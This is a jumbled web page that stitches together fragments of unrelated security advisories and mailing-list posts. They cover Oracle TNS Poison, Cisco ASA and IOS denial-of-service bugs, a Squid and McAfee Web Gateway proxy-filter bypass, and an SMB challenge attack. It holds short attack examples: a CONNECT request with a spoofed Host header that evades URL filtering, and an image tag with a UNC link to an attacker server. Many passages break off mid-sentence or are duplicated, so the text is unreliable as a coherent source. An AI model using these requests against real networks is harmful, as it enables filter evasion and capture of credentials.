Next Page >>
connections
to the latest one (Oracle 11g) without the CPU-APR-2012. The bug was
reported to Oracle in 2008 so it "only" took them 4 years to fix the
vulnerability since reported.
The vulnerability I called TNS Poison affects the component called TNS
Listener, which is the responsible of connections establishment. To
exploit the vulnerability no privilege is needed, just network access to
the TNS Listener. The “feature” exploited is enabled by default in all
Oracle versions starting with Oracle 8i and ending with Oracle 11g
(without CPU-APR-2012).
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Cisco Security Advisory: Multiple Vulnerabilities in Cisco Unity Connection
Advisory ID: cisco-sa-20120229-cuc
Revision 1.0
For Public Release 2012 February 29 16:00 UTC (GMT)
Summary
=======
Cisco IOS Software Release, 15.1(2)T is affected by a denial of
service (DoS) vulnerability during the TCP establishment phase. The
vulnerability could cause embryonic TCP connections to remain in a
SYNRCVD or SYNSENT state. Enough embryonic TCP connections in these
states could consume system resources and prevent an affected device
from accepting or initiating new TCP connections, including any
TCP-based remote management access to the device.
To be clear, the CONNECT request is a single request/response cycle between the client and the proxy. Any request body is nonsensical and should be ignored by the proxy (or the request can be rejected if the proxy wants to be pedantic). There is nothing that explicitly disallows inclusion of the host header in a CONNECT request. Granted, including the host header incurs some degree of ambiguity (the FQDN may resolve to the IP address, but the IP address is not guaranteed to resolve to the FQDN), but this is clearly a debatable choice on the developer's part as to whether it should be used to determine traffic policy applicability for this request.
The proxy should only ignore further data between the client and remote if the proxy successfully established a TCP connection between them on the specified destination port.
IOW, if the client sends a CONNECT request that the proxy policy allows, the proxy should either queue or reject further communication from the client until the TCP connection has been successfully established and the proxy has responded to the client with "HTTP 200".
If the connection attempt fails, the proxy should provide an HTTP error response to the client and close the client-to-proxy connection.
Likewise, while the proxy does establish the end-to-end TCP connection between the client and upstream server, it is not responsible for any part of the encryption that may be involved in that communication - unless it specifically offers a "trusted MitM" feature such as TMG HTTPS Inspection or Juniper SSL Forward Proxy (other vendors have similar features).
Also, whether the McAffee proxy allows translating normal HTTP methods to CONNECT, then tunneling them to the upstream proxy is irrelevant to the question of whether the local proxy actually uses the host header or the host portion of the CONNECT request to determine policy applicability.
exhaustive).
Since this problem was also found on Windows versions as old as Windows
NT4, this scenario might still be possible.
(ii) An attacker A connects to system S and sends mutiple 'SMB
Negotiate Protocol Request' packets with the 'Flags2' field set to
0xc001 to obtain several challenges, and stores them. The attacker A
then forces a user U on system S to connect to his own specially crafted
SMB server, for example by sending an email with multiple <IMG> tags
with UNC links (e.g.: <IMG SRC=\\evilserver\share\a.jpg>) or a link to
inaccessible by means of the prefetch cache control directive.
The procedure is very simple, sending several times a simple GET
HTTP/1.1 request to the victim URL will make the proxies no longer
serve it. Users will be waiting for about two minutes and then the TCP
connection will be closed, which depending on the user agent it will
be interpreted as a valid zero-length HTTP 0.9 reply or an error.
It is worth noting that this attack affects the URL EXACTLY. For
instance, attacking http://www.google.com/ will not block
http://www.google.com./ (notice the dot before the last slash), nor
Cisco IOS Software contains a vulnerability when the Cisco IOS SSL
VPN feature is configured with an HTTP redirect. Exploitation could
allow a remote, unauthenticated user to cause a memory leak on the
affected devices, that could result in a memory exhaustion condition
that may cause device reloads, the inability to service new TCP
connections, and other denial of service (DoS) conditions.
Cisco has released free software updates that address this
vulnerability. There is a workaround to mitigate this vulnerability.
This advisory is posted at
=======
Cisco ASA 5500 Series Adaptive Security Appliances are affected by the
following vulnerabilities:
* TCP Connection Exhaustion Denial of Service Vulnerability
* Session Initiation Protocol (SIP) Inspection Denial of Service
Vulnerabilities
* Skinny Client Control Protocol (SCCP) Inspection Denial of
Service Vulnerability
* WebVPN Datagram Transport Layer Security (DTLS) Denial of Service
SIP processing errors.
IPSec Client Authentication Processing Vulnerability
Cisco PIX and Cisco ASA devices that terminate remote access VPN
connections are vulnerable to a denial of service attack if the
device is running software versions prior to 7.2(4)2, 8.0(3)14, and
8.1(1)4. Cisco PIX and Cisco ASA devices that run software versions
7.0 and 7.1 are not affected by this vulnerability.
SSL VPN Memory Leak Vulnerability
??
I'm unclear - exactly how does an ICMP echo cycle have anything to do with the apparent disparity between the host portion of the CONNECT URI and the contents of the host header?
I can see the logic in :
1. comparing the HOST header to the host portion of the CONNECT URI
2. resolving either to a name or IP address (depending on its original state)
3. comparing the resolved results to each other (DNS RR records will be an interesting case)
The thing to bear in mind is that reverse resolution (IP-to-name) on the Internet tends to be flaky to the point of completely useless.
There are two main problems:
What I understand from the advisory is the Squid proxy is basing its
filtering on the Host header when present, even for the CONNECT
command which doesn't allow this header at all as it makes no sense. I
haven't confirmed the bug but what's being described is definitely a
vulnerability.
There's also a small misconception in what you said. The proxy will
see the entire CONNECT request, headers and all - after the request
headers there'll be a pair of newlines, and only *then* the remaining
data is tunneled transparently. So it's the second request's headers
In McAfee Web Gateway it is possible to convert GET methods in CONNECT
methods, and after the connection, send the same get packet, without
modification and without cryptography. Even with the get packets
passing through the proxy without cryptography and with the Host field
pointing to a filtered site, the proxy will accept.
I think it is a vulnerability!
See my python code.
Thanks
Hello,
We might be able to fix this by simply doing a ping to the website
before connecting, so that the IP of the host specified matches the
connect field. In any case, the consistency of the host and connect is
indeed a big design flaw.
- Vikram
On Mon, Apr 16, 2012 at 6:12 PM, Gabriel Menezes Nunes
Devices running software versions on the 8.0 release that are
configured for Telnet, Secure Shell (SSH), WebVPN, SSL VPN, or ASDM
enabled are affected by this vulnerability.
The telnet command is used identify the IP addresses from which the
security appliance accepts Telnet connections.
ASA(config)# telnet 192.168.10.0 255.255.255.0 inside
In the previous example, the Cisco ASA is configured to accept Telnet
connections on the inside interface from the 192.168.10.0/24 network.
Oracle is a widely-deployed Database Management System (DBMS) that supports a variety of applications. Many multi-tier applications are designed to use proxy authentication, restricting a middle tier to establish the database connection on behalf of the users. The standard authentication mechanism requires the client, the middle tier in this case, to provide valid credentials in order to authenticate and connect to the DBMS. User sessions are then created through the proxy connection. Oracle TNS protocol messages are used for session setup, authentication and data transfer.
Scope
Imperva’s Application Defense Center (ADC) conducts extensive research on enterprise applications and databases. During its research, the team has identified a vulnerability in Oracle’s proxy authentication and access control mechanism.
Findings
A forward proxy server when presented with a CONNECT request is solely responsible for attempting to facilitate an end-to-end encrypted path between the requesting client and the far end server. The CONNECT method does no more than create a temporary hole in your firewall.
Only once that is done is a normal HTTP request, including headers such as the Host: header, passed over the encrypted path by the client. Most crucially, the proxy server cannot see the HTTP request or its headers due to the end-to-end encryption. You can use the encrypted path to carry any protocol or data you like and the proxy server is quite oblivious to it as it is opaque to the proxy.
The only access control that the proxy server can perform is based on the CONNECT method request and the server identified in it by either IP number or FQDN and port.
You do not say what the acl is that you have asked Squid to apply but it cannot involve any examination of the Host: header of a request if the CONNECT method is used; only the far end server can see that.
The same conclusion also applies to your other post about a vulnerability with "McAfee Web Gateway URL Filtering Bypass"
Date: 09.09.2009
________________________________________________________________________
Vendor: Microsoft Corporation
Product: Microsoft Windows XP/Vista TCP/IP-Stack
Vulnerability: TCP/IP Orphaned Connections Vulnerability
Affected Releases: Windows Vista Business SP1/ Windows XP SP3
Severity: Moderate
CVE: CVE-2009-1926
________________________________________________________________________
Vendor: Ruby
Vendor URL: http://www.ruby-lang.org
Versions affected: 1.8.5, 1.8.6, Trunk Ruby
Systems Affected: All Ruby Platforms
Severity: Medium - Compromise of SSL connection integrity
Author: Chris Clark <cclark[at]isecpartners[dot]com>
Vendor notified: Yes
Public release: Yes
Advisory URL: http://www.isecpartners.com/advisories/2007-006-rubyssl.txt
# CVE: CVE-2012-2212
I found a vulnerability in McAfee Web Gateway 7 that allows access to
filtered sites.
The appliance believes in the Host field of HTTP Header using CONNECT method.
Example
CONNECT 66.220.147.44:443 HTTP/1.1
Host: www.facebook.com
Vendor description:
---------------
The SonicWALL Global VPN Client provides mobile users with access to
mission-critical network resources by establishing secure connections to
their office network's IPSec-compliant SonicWALL VPN gateway.
Vulnerabilty overview:
---------------
Affected Products
=================
This vulnerability affects all unfixed versions of Cisco IOS XR
Software devices configured to accept SSHv1 connections. Details on
the affected versions can be found in the Software Versions and Fixes
section of this advisory.
Vulnerable Products
+------------------
actually required to access a specific site on multi-homed web sites.
When no host header is used, the intended web site is actually not
displayed. Therefore, there is no risk.
Macula's Analysis: If you dont have properly installed some AV, HIPS,
etc, through this vuln, a workstation can connect to a malicious
"Hacking Site" and get infected. Also through this vuln, you can
connect to different porn sites without problems. And no matter if its
or not multi-homed web sites. So we consider its not a low risk.
> # Tested on: Squid Proxy 3.1.19
> # CVE: CVE-2012-2213
>
>
> I found a vulnerability in Squid Proxy that allows access to filtered sites.
> The software believes in the Host field of HTTP Header using CONNECT method.
> Example
>
> CONNECT 66.220.147.44:443 HTTP/1.1
> Host: www.facebook.com
>
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c02550412
Version: 1
HPSBMA02593 SSRT100237 rev.1 - HP Virtual Connect Enterprise Manager (VCEM) for Windows, Remote Arbitrary File Download
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2010-10-21
Last Updated: 2010-10-21
# Tested on: Squid Proxy 3.1.19
# CVE: CVE-2012-2213
I found a vulnerability in Squid Proxy that allows access to filtered sites.
The software believes in the Host field of HTTP Header using CONNECT method.
Example
CONNECT 66.220.147.44:443 HTTP/1.1
Host: www.facebook.com
these vulnerabilities. A Cisco ASA device configured for any of the
following features is affected:
* Secure Socket Layer Virtual Private Network (SSL VPN)
* When the affected device is configured to accept Cisco Adaptive
Security Device Manager (ASDM) connections
* TLS Proxy for Encrypted Voice Inspection
* Cut-Through Proxy for Network Access when using HTTPS
SSL VPN (or WebVPN) is enabled with the "enable <interface name>"
command in "webvpn" configuration mode. SSL VPN is disabled by default.
(WLC) platforms. This security advisory outlines the details of the
following vulnerabilities:
* Malformed HTTP or HTTPS authentication response denial of service
vulnerability
* SSH connections denial of service vulnerability
* Crafted HTTP or HTTPS request denial of service vulnerability
* Crafted HTTP or HTTPS request unauthorized configuration
modification vulnerability
Cisco has released free software updates that address these
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Firebird SQL op_connect_request main listener shutdown vulnerability
1. *Advisory Information*
Title: Firebird SQL op_connect_request main listener shutdown vulnerability
Summary:
Under certain conditions, Miranda ignores the "Use TLS" setting in
Jabber accounts and uses an unencrypted connection.
Affected: Miranda IM (instant messenger), at least versions 0.8.16,
0.9.0 alpha build #6 Unicode and SVN rev. 11383
Description:
If the following conditions are met:
- "Use TLS" is enabled in the jabber account settings (Network -
******* Salvatore "drosophila" Fresta *******
[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com
[+] Bugs: [A] Blind SQL Injection
[+] Exploitation: Remote
[+] Date: 1 Apr 2009
Next Page>>
|
